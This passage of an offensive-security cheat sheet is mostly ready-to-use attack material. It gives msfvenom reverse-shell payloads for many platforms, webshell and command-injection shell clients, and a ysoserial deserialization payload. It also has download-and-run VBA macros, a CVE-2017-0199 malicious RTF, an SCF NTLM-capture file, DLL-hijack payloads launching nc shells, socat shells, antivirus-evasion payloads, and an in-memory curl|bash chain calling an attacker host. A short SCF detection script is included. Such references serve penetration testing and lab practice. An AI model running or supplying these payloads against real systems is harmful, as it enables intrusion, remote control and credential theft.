msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=<HostIP> LPORT=4545 -f dll > h4rithd.dll
```

### 04.2 Linux

```bash
## ------------------| Reverse Shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<HostIP> LPORT=4545 -f elf > h4rithd.elf
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<HostIP> LPORT=4545 -f elf > h4rithd.elf
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<HostIP> LPORT=4545 -f elf > h4rithd.elf   

## ------------------| Bash Reverse Shell
msfvenom -p cmd/unix/reverse_bash LHOST=<HostIP> LPORT=4545 -f raw > shell.sh

## ------------------| MSF Bind Shell
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=<HostIP> LPORT=4545 -f elf > h4rithd.elf
```

### 04.3 Other

#### **Shellcode**

```bash
## msfvenom --help-formats
## ------------------| Linux
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<HostIP> LPORT=4545 -f <language>
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<HostIP> LPORT=4545 -f <language>

## ------------------| Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<HostIP> LPORT=4545 -f <language>
msfvenom -p windows/shell_reverse_tcp LHOST=<HostIP> LPORT=4545 EXITFUNC=thread -f hex > Shellcode.txt
msfvenom -p windows/shell_reverse_tcp LHOST=<HostIP> LPORT=4545 EXITFUNC=thread -f c -e x86/shikata_ga_nai > Shellcode.txt
msfvenom -p windows/x64/meterpreter/shell_reverse_tcp LHOST=<HostIP> LPORT=4545 EXITFUNC=thread -f hex > Shellcode.txt

## ------------------| Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<HostIP> LPORT=4545 -f <language>
```

#### ASP/ ASPX

```bash
## ------------------| MSF Reverse Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<HostIP> LPORT=4545 -f aspx >reverse.aspx 

## ------------------| Reverse Shell  
msfvenom -p windows/shell_reverse_tcp LHOST=<HostIP> LPORT=4545  -f aspx >reverse.aspx         
```

#### PHP

```bash
## ------------------| MSF Reverse Shell
msfvenom -p php/meterpreter_reverse_tcp LHOST=<HostIP> LPORT=4545 -f raw -b '"' > evil.php

## ------------------| Reverse Shell
msfvenom -p php/reverse_php LHOST=<HostIP> LPORT=4545 -f raw -b '"' > evil.php

echo -e "<?php $(cat evil.php)" > shell.php
```

#### JSP

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<HostIP> LPORT=4545 -f raw> reverse.jsp
```

#### HTA

```bash
msfvenom -p windows/shell_reverse_tcp LHOST=<HostIP> LPORT=4545 -f hta-psh -o evil.hta          

## ------------------| Split the payload with python
str = "powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQ....."
n = 50
for i in range(0, len(str), n):
    print ("Str = Str + " + '"' + str[i:i+n] + '"')   

## ------------------| Then use with
Dim Str As String 
Str = Str + "powers.....
Shell (Str)  
```

#### MS Macro

```bash
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=<HostIP> LPORT=4545 -e x86/shikata_ga_nai -f vba-exe
```

#### WAR (tomcat)

```bash
## ------------------| Create payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<HostIP> LPORT=4545 -f war > reverse.war   

## ------------------| Upload war file
curl -u 'username:password' -T reverse.war http://10.10.10.10:8080/manager/text/deploy?path=/h4rithd
```

#### NodeJS

```bash
msfvenom -p nodejs/shell_reverse_tcp LHOST=<HostIP> LPORT=4545
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<HostIP> LPORT=4545 -f js_le -e generic/none 
```

#### **Perl**

```bash
msfvenom -p cmd/unix/reverse_perl LHOST=<HostIP> LPORT=4545 -f raw > reverse.pl
```

#### **Python**

```bash
msfvenom -p cmd/unix/reverse_python LHOST=<HostIP> LPORT=4545 -f raw > reverse.py
```

## 05. NamedPipes (forward-shell)

```python
#!/usr/bin/python3
# Authors: ippsec, 0xdf
# Modified by: h4rithd.com

import base64
import random
import requests
import threading
import time

class WebShell(object):
    def __init__(self, interval=1.3 , proxies='http://127.0.0.1:8080'):
        self.url = r"http://10.10.10.67/shell.php" # MODIFY THIS, URL
        self.proxies = {'http' : proxies}
        session = random.randrange(10000,99999)
        print(f"[+] Session ID: {session}")
        self.stdin = f'/dev/shm/input.{session}'
        self.stdout = f'/dev/shm/output.{session}'
        self.interval = interval

        print("[+] Setting up fifo shell on target")
        MakeNamedPipes = f"mkfifo {self.stdin}; tail -f {self.stdin} | /bin/sh 2>&1 > {self.stdout}"
        self.RunRawCmd(MakeNamedPipes, timeout=0.1)

        print("[+] Setting up read thread")
        thread = threading.Thread(target=self.ReadThread, args=())
        thread.daemon = True
        thread.start()

    def ReadThread(self):
        GetOutput = f"/bin/cat {self.stdout}"
        while True:
            result = self.RunRawCmd(GetOutput , proxy=None)
            if result:
                print(result)
                ClearOutput = f'echo -n "" > {self.stdout}'
                self.RunRawCmd(ClearOutput)
            time.sleep(self.interval)

    def RunRawCmd(self, cmd, timeout=50, proxy=""): # "http://127.0.0.1:8080"):
        payload =  {'cmd' : cmd} # MODIFY THIS IF YOU WANT: This is where your payload code goes

        if proxy:
            proxies = self.proxies
        else:
            proxies = {}

        try:
            r = requests.get(self.url, params=payload, timeout=timeout , proxies=proxies) # ,auth=('webdav_tester','babygurl69'))
            return r.text
        except requests.RequestException:
            return None

    def WriteCmd(self, cmd):
        b64cmd = base64.b64encode('{}\n'.format(cmd.rstrip()).encode('utf-8')).decode('utf-8')
        stage_cmd = f'echo {b64cmd} | base64 -d > {self.stdin}'
        self.RunRawCmd(stage_cmd)
        time.sleep(self.interval * 1.1)

    def UpgradeShell(self):
        UpgradeShell = """python3 -c 'import pty; pty.spawn("/bin/bash")'"""
        self.WriteCmd(UpgradeShell)

prompt = "sh3ll> "
S = WebShell()
while True:
    cmd = input(prompt)
    if cmd == "upgrade":
        prompt = ""
        S.UpgradeShell()
    else:
        S.WriteCmd(cmd)
```

## 06. SimpleShell

* For post request. (use if firewall block any kind of reverse shells)

```python
import re
import html
import requests
from cmd import Cmd

## Replace the url here!
url="http://10.10.10.127/select"

class Terminal(Cmd):
    prompt = '$hell: '

    def default(self, args):
        output = RunCmd(args)
        print (output)

def RunCmd(cmd):
    ## Replace post data here! (ex: db=a;id)
    data = { 'db' : f'a; echo -n "sel01"; {cmd}; echo -n "sel02"'}
    r = requests.post(url,data=data)
    page = html.unescape(r.text)
    results = re.search('sel01(.*?)sel02',page, re.DOTALL)
    if results:
        return results.group(1)
    else:
        return "[-] output markers not found in response"

term = Terminal()
term.cmdloop()
```

## 07. Deserialization Payloads

### 07.1 DotNet ([ysoserial.net](https://github.com/pwntester/ysoserial.net))

* ObjectDataProvider

```bash
.\ysoserial.exe -g ObjectDataProvider -f Json.Net -c "ping -c 1 10.10.14.25" -o raw

{
  "$type": "System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
  "MethodName": "Start",
  "MethodParameters": {
    "$type": "System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "$values": ["cmd", "/c powershell -EncodedCommand  <command>"]
  },
  "ObjectInstance": {
    "$type": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"
  }
}
```

## 08. Macro / RTF / SCF

### 08.1 MS Macro

* Simple script

```vb
Sub AutoOpen()
    MacroName
End Sub

Sub Document_Open()
    MacroName
End Sub

Sub MacroName()
    CreateObject("Wscript.Shell").Run "powershell -EncodedCommand SQBFAF..gBlA=="
End Sub
```

* Download and Execute

```vb
Sub AutoOpen()

Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", "http://<HostIP>/<FileName>", False
xHttp.Send

With bStrm
 .Type = 1
 .Open
 .write xHttp.responseBody
 .savetofile "file.exe", 2
End With

Shell ("file.exe")

End Sub
```

### 08.2 OO Macro

```bash
use exploit/multi/misc/openoffice_document_macro
```

```bash
Sub OnLoad
    Shell("cmd.exe /c ping <IP>")
End Sub
```

```vb
Sub OnLoad
  Dim os as string
  os = GetOS
  If os = "windows" OR os = "osx" OR os = "linux" Then
    Exploit
  end If
End Sub

Sub Exploit
  Shell("cmd.exe /c ping <IP>")
End Sub

Function GetOS() as string
  select case getGUIType
    case 1:
      GetOS = "windows"
    case 3:
      GetOS = "osx"
    case 4:
      GetOS = "linux"
  end select
End Function
```

### 08.3 Rich Text Format (RTF)

```bash
## ------------------| Create HTA file
## 1st copy nishang's Invoke-PowerShellTcp.ps1 to rev.ps1 and append the call that actually runs it
## (Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port 4545); the script alone only defines the function
pwsh
Import-Module /usr/share/nishang/Client/Out-HTA.ps1
Out-HTA -PayloadURL http://<IP>/rev.ps1
exit
mv *.hta rev.hta

## ------------------| Create malicious RTF file (CVE-2017-0199: Word fetches the linked HTA and runs it)
git clone https://github.com/bhdresh/CVE-2017-0199.git
python2 CVE-2017-0199/cve-2017-0199_toolkit.py -M gen -w rev.rtf -u http://<IP>/rev.hta -x 0

## ------------------| Serve rev.hta and rev.ps1 and start the listener before the target opens rev.rtf
python3 -m http.server 80
nc -lvnp 4545
```

### 08.4 SCF (Shell Command Files)

```bash
## ------------------| payload.scf
## Drop it on a share users browse: Explorer renders the icon from the UNC path and authenticates
## to <MyIP> over SMB, so capture or relay the NetNTLM there (e.g. Responder / ntlmrelayx)
[Shell]
Command=2
IconFile=\\<MyIP>\share\h4rithd.ico
[Taskbar]
Command=ToggleDesktop
```
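The same property that makes the SCF above useful, an `IconFile` that points at a UNC path, is also the indicator a defender hunts for on file shares. The following is an added example, not code from the page: it parses SCF files the way Explorer does (INI sections), extracts the UNC host, and flags hosts outside the trusted networks. The sample files, the trusted ranges and the host names are constructed for the demonstration.

```python
# Added example, not from the page: the detection side of the SCF trick above. It parses
# .scf files the way Explorer reads them (INI sections) and flags any IconFile that is a
# UNC path to a host outside the trusted networks, which is exactly what the payload relies
# on to make Explorer authenticate to <MyIP>. Samples and networks below are constructed.
import configparser
import ipaddress
import re
from typing import Optional

UNC_RE = re.compile(r"^\\\\([^\\]+)\\")  # \\host\share\... -> host


def parse_scf_shell(text: str) -> dict:
    """Return the keys of the [Shell] section (names lower-cased by configparser); {} if absent."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    return dict(cp.items("Shell")) if cp.has_section("Shell") else {}


def unc_host(path: str) -> Optional[str]:
    """Host part of a UNC path, or None for local paths such as %SystemRoot%\\system32\\x.dll."""
    m = UNC_RE.match(path.strip().strip('"'))
    return m.group(1) if m else None


def is_untrusted(host: str, trusted_nets, trusted_hosts) -> bool:
    """An IP is trusted if it falls inside trusted_nets; a name only if explicitly listed,
    because an SCF pointing at an unknown name still makes Explorer authenticate to it."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return host.lower() not in {h.lower() for h in trusted_hosts}
    return not any(ip in net for net in trusted_nets)


def scan_scf(text: str, trusted_nets, trusted_hosts=()) -> Optional[str]:
    """Finding text when the SCF would make Explorer fetch its icon from an untrusted UNC host."""
    icon = parse_scf_shell(text).get("iconfile", "")
    host = unc_host(icon)
    if host is not None and is_untrusted(host, trusted_nets, trusted_hosts):
        return f"SCF pulls icon over SMB from untrusted host {host}: {icon}"
    return None


# Constructed samples: a benign SCF (icon from a system DLL) and the payload shape from the page
BENIGN_SCF = "[Shell]\nCommand=2\nIconFile=%SystemRoot%\\system32\\SHELL32.dll,3\n[Taskbar]\nCommand=ToggleDesktop\n"
PAYLOAD_SCF = "[Shell]\nCommand=2\nIconFile=\\\\203.0.113.10\\share\\h4rithd.ico\n[Taskbar]\nCommand=ToggleDesktop\n"
TRUSTED_NETS = [ipaddress.ip_network("10.0.0.0/8"), ipaddress.ip_network("192.168.0.0/16")]

if __name__ == "__main__":
    for name, text in (("benign.scf", BENIGN_SCF), ("payload.scf", PAYLOAD_SCF)):
        print(name, "->", scan_scf(text, TRUSTED_NETS, trusted_hosts=["fileserver"]) or "clean")
```

Pointing the scanner at a share is a matter of reading every `*.scf` (and, with the same UNC check, `*.url` and `*.lnk` targets) and calling `scan_scf`; hits on an internal but unexpected host are worth a look too, since relay attacks work just as well from inside the trusted ranges.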

## 09. DLL Hijack

* Payload 0x01

```c
#include <windows.h>
#include <stdlib.h>   // system()

// DllMain runs at load time (DLL_PROCESS_ATTACH), before rundll32 even looks up the export named on
// its command line, so the payload fires whatever export name is passed.
BOOL WINAPI DllMain(HINSTANCE hDll, DWORD dwReason, LPVOID lpReserved){
    if (dwReason == DLL_PROCESS_ATTACH){
        system("cmd.exe /c ping -n 1 <IP>");   // canary: confirms execution (watch for ICMP on <IP>)
        WinExec("C:\\Windows\\system32\\spool\\drivers\\color\\nc.exe <IP> 4545 -e powershell", 0);
        ExitProcess(0);                         // kills the host process once the shell is out
    }
    return TRUE;
}

// [x64 compile]: x86_64-w64-mingw32-gcc DllMain.c -shared -o DllMain64.dll
// [x86 compile]: i686-w64-mingw32-gcc DllMain.c -shared -o DllMain32.dll
// [test run]:    rundll32 DllMain64.dll,DllMain   (bitness must match the process that will load it)
```

* Payload 0x02

```c
#include <windows.h>
#include <stdlib.h>   // system()

BOOL WINAPI DllMain(HINSTANCE hDll, DWORD dwReason, LPVOID lpReserved){
    switch(dwReason){
        case DLL_PROCESS_ATTACH:
            system("cmd.exe /c ping -n 1 <IP>");   // goes through cmd.exe, so shell syntax works
            // WinExec starts the program directly (no shell), so it does not accept redirections like system()
            WinExec("C:\\windows\\System32\\spool\\drivers\\color\\nc.exe -e cmd <IP> 4545", 0);
            break;
        case DLL_PROCESS_DETACH:
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
            break;
    }
    return TRUE;   // unlike payload 0x01 the host process keeps running
}

// [x86 compile]: i686-w64-mingw32-gcc payload02.c -shared -o payload02.dll
// [x64 compile]: x86_64-w64-mingw32-gcc payload02.c -shared -o payload02.dll
// (no -lws2_32 needed: nothing here uses Winsock)
```

* Payload 0x03 \[C++]

```cpp
#include <windows.h>
#include <cstdlib>   // system(), exit()

int owned()
{
  system("cmd.exe /c ping -n 1 <IP>");
  WinExec("C:\\Windows\\system32\\spool\\drivers\\color\\nc.exe <IP> 4545 -e powershell", 0);
  exit(0);     // terminates the host process here; nothing below runs
  return 0;
}

// Called for every reason code; owned() exits the process on the first call, so the FALSE (0)
// return value, which would otherwise make LoadLibrary fail, is never reached.
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
  owned();
  return 0;
}
// [Step01]: x86_64-w64-mingw32-g++ -c -DBUILDING_EXAMPLE_DLL payload03.cpp
// [Step02]: x86_64-w64-mingw32-g++ -shared -o payload03.dll payload03.o -Wl,--out-implib,payload03.a
```

* Payload 0x04

```c
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>

// Runs on a fresh thread after DllMain has returned, so the payload does not execute under the
// loader lock and the host process keeps running (nothing calls ExitProcess here).
DWORD WINAPI Entry(LPVOID lpParam){
    system("cmd.exe /c ping -n 1 <IP>");
    WinExec("C:\\Windows\\system32\\spool\\drivers\\color\\nc.exe <IP> 4545 -e powershell", 0);
    return 0;
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved){
    switch (ul_reason_for_call){
        case DLL_PROCESS_ATTACH:
            CreateThread(NULL, 0, Entry, NULL, 0, NULL);
            break;
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
            break;
    }
    return TRUE;
}

// [x86 compile]: i686-w64-mingw32-gcc payload04.c -shared -o payload04.dll
// [x64 compile]: x86_64-w64-mingw32-gcc payload04.c -shared -o payload04.dll
```
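All four payloads above assume a directory the target process searches and the current user can write to. The discovery step is missing from the page; the following PowerShell is an added example, not the page's own code, that lists such directories (the application's folder, then each PATH entry) by reading their ACLs. `$AppDir` is a placeholder; Deny ACEs and generic access rights are not expanded, so confirm a hit with `icacls` before planting anything.

```powershell
# Added example, not from the page: the discovery step that precedes dropping one of the DLLs above.
# Lists directories the loader will search (the target application's folder, then every PATH entry)
# whose ACL grants the current user, directly or through a group, the right to create files there.
# $AppDir is a placeholder. Deny ACEs and generic rights (GENERIC_WRITE) are not expanded, so verify
# a hit with icacls before relying on it.
$AppDir = 'C:\Program Files\<App>'

$id   = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$sids = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
$writeMask = [int]([System.Security.AccessControl.FileSystemRights]::WriteData -bor
                   [System.Security.AccessControl.FileSystemRights]::AppendData)

$dirs = @($AppDir) + ($env:Path -split ';') |
        ForEach-Object { $_.Trim('"') } |
        Where-Object { $_ -and (Test-Path -LiteralPath $_ -PathType Container) } |
        Select-Object -Unique

foreach ($dir in $dirs) {
    try { $acl = Get-Acl -LiteralPath $dir } catch { continue }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value } catch { continue }
        if (($sids -contains $sid) -and (([int]$ace.FileSystemRights -band $writeMask) -ne 0)) {
            [pscustomobject]@{ Directory = $dir; GrantedTo = $ace.IdentityReference.Value; Rights = $ace.FileSystemRights }
            break   # one matching ACE is enough to report the directory
        }
    }
}
```

A directory that shows up here is only half the story: the DLL name the process asks for and fails to find still has to be confirmed (Process Monitor filtered on `NAME NOT FOUND` is the usual way), and the DLL's bitness must match the process.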

## 10. Socat

* Reverse shell

```bash
## ------------------| On attacker machine (Listen)
socat -d -d TCP4-LISTEN:4545 STDOUT
## full tty instead of STDOUT: socat file:`tty`,raw,echo=0 TCP4-LISTEN:4545

## ------------------| On victim machine
socat TCP4:<IP>:4545 EXEC:/bin/bash
## full tty variant (pair with the file:`tty` listener above): socat TCP4:<IP>:4545 EXEC:/bin/bash,pty,stderr,setsid,sigint,sane
socat TCP4:<IP>:4545 EXEC:'cmd.exe',pipes
```

* Reverse shell \[**Encrypted**]

```bash
## ------------------| On attacker machine (Listen)
openssl req -newkey rsa:2048 -nodes -keyout ssl.key -x509 -days 1000 -subj '/CN=nothing/O=Nothing LTD./C=US' -out ssl.crt
cat ssl.key ssl.crt > ssl.pem
socat -d -d OPENSSL-LISTEN:4443,cert=ssl.pem,verify=0,fork STDOUT

## ------------------| On victim machine
## verify=0 turns certificate checking off on both ends: the traffic is encrypted, but the victim cannot tell the
## real listener from one interposed on the path. To pin it, ship ssl.crt and use cafile=ssl.crt,commonname=nothing instead of verify=0
socat OPENSSL:<IP>:4443,verify=0 EXEC:/bin/bash
socat OPENSSL:<IP>:4443,verify=0 EXEC:'cmd.exe',pipes
```

* Bind shell

```bash
## ------------------| On victim machine (Listen)
socat -d -d TCP4-LISTEN:4545 EXEC:/bin/bash
socat -d -d TCP4-LISTEN:4545 EXEC:'cmd.exe',pipes

## ------------------| On attacker machine 
socat - TCP4:<IP>:4545
```

* Bind shell \[**Encrypted**]

```bash
## ------------------| On victim machine (Listen)
openssl req -newkey rsa:2048 -nodes -keyout ssl.key -x509 -days 1000 -subj '/CN=nothing/O=Nothing LTD./C=US' -out ssl.crt
cat ssl.key ssl.crt > ssl.pem
socat OPENSSL-LISTEN:4443,cert=ssl.pem,verify=0,fork EXEC:/bin/bash
socat OPENSSL-LISTEN:4443,cert=ssl.pem,verify=0,fork EXEC:'cmd.exe',pipes

## ------------------| On attacker machine 
socat - OPENSSL:<IP>:4443,verify=0
```

## 11. [GreatSCT](https://github.com/GreatSCT/GreatSCT)

* Basic use

```bash
## ------------------| Create payload
python3 /opt/GreatSCT/GreatSCT.py --clean
python3 /opt/GreatSCT/GreatSCT.py --ip <HostIP> --port 4545 -t bypass -p regsvcs/meterpreter/rev_tcp.py -o serv    

## ------------------| Create pwn.bat
cmd /c "echo C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe C:\Temp\serv.dll > C:\Temp\pwn.bat"    

## ------------------| Start msfconsole
msfconsole -r /usr/share/greatsct-output/handlers/serv.rc
```

* Custom-written pure `msbuild meterpreter` stager.

```bash
## ------------------| Create payload
python3 /opt/GreatSCT/GreatSCT.py --clean
python3 /opt/GreatSCT/GreatSCT.py --ip <HostIP> --port 4545 -t bypass -p msbuild/meterpreter/rev_tcp.py -o payload    

## ------------------| Start msfconsole
msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

## ------------------| Execute
### copy this file to the compromised machine: /usr/share/greatsct-output/source/payload.xml
cmd /c C:\Windows\microsoft.net\Framework\v4.0.30319\msbuild.exe payload.xml

## ------------------| Back in msfconsole
sessions -l
sessions -i 1

* Common flags

```bash
GreatSCT Options:
  --update              Update the GreatSCT framework.
  --version             Displays version and quits.
  --list-tools          List GreatSCT's tools
  -t Bypass, --tool Bypass
                        Specify GreatSCT tool to use (Bypass)

Callback Settings:
  --ip IP, --domain IP  IP Address to connect back to
  --port Port           Port number to connect to.

[*] Payload Settings:
  --list-payloads       Lists all available payloads for that tool

Great Scott Options:
  -c [OPTION1=value OPTION2=value [OPTION1=value OPTION2=value ...]]
                        Custom payload module options.
  -o OUTPUT NAME        Output file base name for source and compiled
                        binaries.
  -p [PAYLOAD]          Payload to generate. Lists payloads if none specified.
  --clean               Clean out payload folders.
  --msfoptions [OPTION=value [OPTION=value ...]]
                        Options for the specified metasploit payload.
  --msfvenom [windows/meterpreter/reverse_tcp]
                        Metasploit shellcode to generate.
```

## 13. [Merlin](https://github.com/Ne0nd0g/merlin)

* [Merlin Agent](https://github.com/Ne0nd0g/merlin-agent)

```bash
## ------------------| Create Agent
git clone https://github.com/Ne0nd0g/merlin-agent
## change following lines.
var url = "https://127.0.0.1:443"
var protocol = "https"
var psk = "S3cureK3y658"

### For windows
GOOS=windows GOARCH=amd64 go build
GOOS=windows GOARCH=386 go build

### For Linux
GOOS=linux GOARCH=amd64 go build
```

* [Merlin Server](https://github.com/Ne0nd0g/merlin/releases/tag/v1.3.0)

```bash
## ------------------| Create Cert [For old versions]
cd /data/x509
openssl req -x509 -newkey rsa:4096 -sha256 -nodes -keyout server.key -out server.crt -subj "/CN=G0ole.c0m" -days 3356       

## ------------------| Start server and create listener
./merlinServer
listeners
create https
set Name win64
set Interface <IP>
set PSK S3cureK3y658
show
run
```

## [14. SharpShooter](https://github.com/mdsecactivebreach/SharpShooter)

```bash
## ------------------| Setup
git clone https://github.com/mdsecactivebreach/SharpShooter.git
wget https://files.pythonhosted.org/packages/17/73/615d1267a82ed26cd7c124108c3c61169d8e40c36d393883eaee3a561852/jsmin-2.2.2.tar.gz
tar xzf jsmin-2.2.2.tar.gz
cd jsmin-2.2.2
sudo python2 setup.py install
cd SharpShooter
python2 SharpShooter.py --help

## ------------------| Create Payloads
#### Stageless JavaScript
python2 SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3                
#### Stageless HTA
python2 SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee     
#### Staged VBS
python2 SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4       
#### Custom CSharp inside JS
python2 SharpShooter.py --dotnetver 2 --payload js --sandbox 2,3,4,5 --delivery web --refs mscorlib.dll,System.Windows.Forms.dll --namespace MDSec.SharpShooter --entrypoint Main --web http://www.phish.com/implant.payload --output malicious --smuggle --template mcafee       
#### Creation of a Squiblytwo VBS
python2 SharpShooter.py --stageless --dotnetver 2 --payload vbs --output foo --rawscfile ./x86payload.bin --smuggle --template mcafee --com outlook --awlurl http://192.168.2.8:8080/foo.xsl
#### Creation of a XSL HTA
python2 SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./x86payload.bin --smuggle --template mcafee --com xslremote --awlurl http://192.168.2.8:8080/foo.xsl     
#### Creation of a VBA Macro
python2 SharpShooter.py --stageless --dotnetver 2 --payload macro --output foo --rawscfile ./x86payload.bin --com xslremote --awlurl http://192.168.2.8:8080/foo.xsl    
#### Creation of an Excel 4.0 SLK Macro Enabled Document
msfvenom -p generic/custom PAYLOADFILE=./payload.bin -a x86 --platform windows -e x86/shikata_ga_nai -f raw -o shellcode-encoded.bin -b '\x00'
python2 SharpShooter.py --payload slk --output foo --rawscfile ./shellcode-encoded.bin --smuggle --template mcafee   # use the null-free shellcode from the msfvenom line above
```

## [15. Living Off The Land \[Linux\]](https://www.youtube.com/watch?v=MaBurwnrI4s)

* [With DDExec](https://youtu.be/MaBurwnrI4s?t=366)

```bash
## ------------------| Attacker's machine
## the nc you ship must support -e (ncat or nc.traditional; OpenBSD nc does not) and must be able to run on the
## victim: it is executed from memory but still loads the victim's libc, so a static ncat build is the safer choice
base64 -w0 $(which nc) > nc.b64
wget https://raw.githubusercontent.com/arget13/DDexec/main/ddexec.sh
sudo python3 -m http.server 80
nc -lvnp 4545

## ------------------| Victim's machine (needs bash for the <( ) process substitution; the nc binary never touches disk)
## first argument after ddexec.sh is argv[0] for the in-memory binary, the rest are nc's own arguments
curl AttackersIP/nc.b64 | bash <(curl AttackersIP/ddexec.sh) /bin/nothing -e /bin/sh AttackersIP 4545
```

